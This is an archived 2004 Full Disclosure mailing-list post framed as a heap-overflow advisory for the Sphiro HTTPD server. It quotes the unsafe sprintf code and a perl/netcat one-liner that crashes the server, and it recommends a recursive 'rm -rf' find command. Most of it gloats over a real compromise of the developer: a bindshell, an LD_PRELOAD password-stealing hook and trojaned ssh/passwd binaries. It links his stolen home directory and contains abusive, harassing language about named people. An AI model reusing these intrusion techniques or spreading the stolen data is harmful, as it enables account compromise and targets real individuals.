Full Disclosure mailing list archives
H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security)
From: Slotto Corleone <slotto () gmail com>
Date: Thu, 29 Apr 2004 15:56:50 -0700
Vulnerability: Sphiro HTTPD remote heap overflow Affected Releases: Sphiro 0.1B by rave aka Jonny Mast Vendor: http://www.rosiello.org/ Rosiello Security leader: Angelo Rosiello aka guilecool aka ImperialS ircnet takeover gang irc.taintedknowledge.net #rosiello Solution: simple steps: 1. find / -name 'sphiro*' -exec rm -rf {} \; 2. don't run code written by "Rosiello Security" 3. troll @ irc.taintedknowledge.net #rosiello Description: ∙Topic (#rosiello): http://www.rosiello.org Welcome to Rosiello Security | nothing is neglected ! | sphiro httpd --> http://www.taintedknowledge.net/sphiro_release_0.1B.tar.gz -:- 0.2 has superduper multyplexing $rootdude style Yep verry 1337 -rw-r--r-- 1 slotto users 7123221 Apr 25 07:46 sphiro_release_0.1B.tar.gz AHHHH wtf, 7mb of source? No... Why the hell is pgp source there? :~/tmp/sphiro/icons$ ls -l total 6172 -rw-r--r-- 1 slotto users 11390 Apr 19 13:56 403.jpg -rw-r--r-- 1 slotto users 17139 Apr 19 13:56 404.jpg -rw-r--r-- 1 slotto users 37025 Apr 19 13:56 500.jpg -rw-r--r-- 1 slotto users 243 Aug 31 2002 back.png -rw-r--r-- 1 slotto users 230 Aug 31 2002 folder.png -rw------- 1 slotto users 6230275 Mar 29 09:23 pgp-6.5.1i-beta2.tar.gz -rw-r--r-- 1 slotto users 250 Aug 31 2002 unknown.png - sphiro/libhttp/http_socks.c int get_request(int type,struct sockaddr_in client,int sc,SSL *s) ... char buffer[MAX_READ +1]; char auth_buff[MAX_READ+1]; char filename[128]; ... if (!(request=strstr(buffer,"GET "))) return -1; request +=strlen ( "GET "); if ((pb=strstr(request,"HTTP/1.1")) || (pb=strstr(request,"HTTP/1.1"))) *(pb -1)='\0'; if ( ( find_rullefile(request) == auth_file_present) ) { ... sprintf(filename,"%s%s",config->webroot,request); <-- oops *** What the fuck? This is written by someone who claims to find, exploit, and release advisories but goes and writes code like this? *** - sphiro/libhttp/security.c <-- security? heh int find_rullefile (char *request) ... char *filename; ... filename = (char *) malloc ( strlen(request) + strlen(config->webroot) + strlen ("secure.auth") +1 ); ... sprintf( filename,"%s/%s/secure.auth",config->webroot,request+1); *** nice attempt to dynamically allocate filename this time. but wait, what if we... *** perl -e 'print "GET HTTP/1.1" . "A"x1000 . "\n\n"' |nc localhost 1338 request = "\0" request+1 = "HTTP/1.1" . "A"x1000 . "\n\n" ouch! Core was generated by `./sphiro'. Program terminated with signal 11, Segmentation fault. #0 0x400e7123 in mallopt () from /lib/libc.so.6 (gdb) bt #0 0x400e7123 in mallopt () from /lib/libc.so.6 #1 0x400e61e3 in malloc () from /lib/libc.so.6 #2 0x0804b2a4 in find_rullefile (request=0xbffff414 "") at security.c:62 #3 0x08049d8f in get_request (type=1, client= {sin_family = 2, sin_port = 58496, sin_addr = {s_addr = 16777343}, sin_zero = "Z*\000\000\b@KÆ"}, sc=7, s=0x0) at http_socks.c:259 #4 0x08049c13 in start_daemon (port=91) at http_socks.c:146 #5 0x08049269 in main (argc=1094795585, argv=0x41414141) at sphiro.c:68 (gdb) Unrelated but funny stories of rave (Jonny Mast) getting owned: - rave gets his account backdoored on kokanin's box. He finds the obviously placed bindshell stashed as ~/bin/zsh. He laughs and says the backdoor was lame. Well he obviously missed the getpass() LD_PRELOAD, ssh, and passwd all on his local account mailing all his new passwords out. Oh, and he left an exploit (servu.c) in his directory for the version of servu ftpd he was running on his home windows machine. Oops. -== Remote Exploit for serv-u version v4.1 [MDTM] ==-- Code by: rave Contact: rave () rosiello org Date: Feb 2004 Here is his home directory: http://fogheaven.phrack.nl/rave.tar.gz Apr 24 08:20:13 <rave> im about to release my httpd Apr 24 08:21:01 <rave> yes yes opensource Apr 24 08:25:20 <rave> fixing the release of the httpd Apr 24 08:27:50 <rave> does this look 1337 or what Apr 24 08:27:51 <rave> chmod 777 $install/sphiro/{icons,errors} Apr 24 08:29:10 * rave is working on the install .sh script that works with ./configure and the makefiles ... Apr 24 08:37:27 <rave> ilja #rosiello misses you Apr 24 08:38:32 <ilja> no 1 in #rosiello Apr 24 08:39:35 <rave> i do Apr 24 08:39:40 <rave> im rosiello Apr 24 08:39:46 <rave> with 21 others Apr 24 08:40:02 <rave> at tops since whe linked with 0x557 securitu Apr 24 08:40:05 <rave> at tops since whe linked with 0x557 security Apr 24 08:40:42 <rave> <-- mercy heeft verlaten (Ping timeout) Apr 24 08:40:46 <rave> hmm Apr 24 08:41:07 <rave> he died Apr 24 08:41:16 <rave> on rosiello i think here as well Apr 24 08:41:25 <rave> my knife actualy worked Apr 24 08:41:30 <mercy> O_O Apr 24 08:41:32 <mercy> right ... Apr 24 10:09:22 <rave> http://www.taintedknowledge.net/images/people/rave.jpg Apr 24 10:11:30 <rave> http://www.taintedknowledge.net/images/people/rosiello/ ... Apr 24 10:13:01 <ilja> nraziz is a member of rosiello ? Apr 24 10:13:24 <rave> no Apr 24 10:13:29 <rave> a visitor Apr 24 10:13:33 <rave> mercy is a member Apr 24 10:13:34 <rave> me Apr 24 10:13:39 <ilja> mercy is ? Apr 24 10:13:43 <ilja> didn't know that Apr 24 10:13:50 <rave> ex w00w00 what his name again Apr 24 10:13:55 <rave> and angelo Apr 24 10:14:10 <rave> ex w00w00 napster Apr 24 10:14:26 <rave> angelo,rave,napster,mercy Apr 24 10:14:38 <ilja> mercy is really in rosiello ? Apr 24 10:14:42 <ilja> i though you were kidding Apr 24 10:15:06 <rave> no im not ... Apr 24 10:17:23 <rave> no Apr 24 10:17:33 <rave> angelo has some lag in updating the site Apr 24 10:17:48 <rave> i was like 3 months in rosiello and still the site sayed Apr 24 10:17:52 <rave> angelo,phinix Apr 24 10:17:58 <rave> *phunix Apr 24 10:18:07 <_demiurge> hey rave Apr 24 10:18:19 <rave> in the mean while i released 6 remote exploits for windows ... a few hours later ... ... rave finds out GOBBLES hacked drunken.fi.st ... Apr 24 13:25:18 <rave> KOKANIN UR BOX IS FUKCING HACKED AND ALL MY STUFF IS GONE!!!!!!!!! Apr 24 13:25:19 <rave> ty Apr 24 13:25:45 <rave> eted Apr 24 13:25:45 <rave> <calibre> hmm Apr 24 13:25:49 <rave> oops Apr 24 13:26:02 <rave> /usr/X11R6/bin/xauth: timeout in locking authority file /home/rave/.Xauthorityhi from GOBBLES Apr 24 13:26:02 <rave> rm: /home/GOBBLES_rave: Permission denied Apr 24 13:26:02 <rave> cp: /tmp/suid_shell_rave: Permission denied Apr 24 13:26:02 <rave> chmod: /tmp/suid_shell_rave: Operation not permitted Apr 24 13:26:02 <rave> rave@drunken:~ $ls Apr 24 13:26:03 <rave> rave@drunken:~ $ls Apr 24 13:26:04 <rave> rave@drunken:~ $dir Apr 24 13:26:06 <rave> -bash: dir: command not found Apr 24 13:26:08 <rave> rave@drunken:~ $ls Apr 24 13:26:12 <rave> rave@drunken:~ $ Apr 24 13:26:16 <rave> where is my research Apr 24 13:26:59 <rave> who the fuck has bee g00fing on that box ?, report to me and ile show u how mad i am Apr 24 13:27:16 <rave> that is like 2 years of research missig stupid fucks Apr 24 13:27:24 <rave> bah Apr 24 13:28:58 <rave> sorry i didnt realy intended to react like that but im mad i hope there are backups some where Here is your backup rave: http://fogheaven.phrack.nl/rave.tar.gz --- signature --- chris, go fuck a horse you cockknocker | chris (~chris () crew tkn us) (United States of America) │ ircname : chris | channels : @#rosiello #knasboll.se #rootshell #tkn │ server : irc.tx.us.taintedknowledge.net (Sponsored By Project 9 Studios) | register : chris - is a registered nick | operator : chris (is NOT an IRC warrior) ∙φ∙ You have been Network-Banned. This terrorism was funded by: Kajun, thanks for social engineering rave and taking the blame boobys.org, LOL ROFFLE <sorbo> Slotto Corleone il boss mafioso di Internet #plan9, GNU assault team _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) Slotto Corleone (Apr 29)
- Re: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) Richard Johnson (Apr 29)
- Re: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) Slotto Corleone (Apr 30)
- <Possible follow-ups>
- H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) Slotto Corleone (Apr 29)
- Re: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) morning_wood (Apr 29)
- Re: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) Slotto Corleone (Apr 30)
- Re: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) morning_wood (Apr 30)
- Re: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) morning_wood (Apr 29)
- Re: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) 3APA3A (Apr 30)
- Re: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) Slotto Corleone (Apr 30)
- Re: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) Richard Johnson (Apr 29)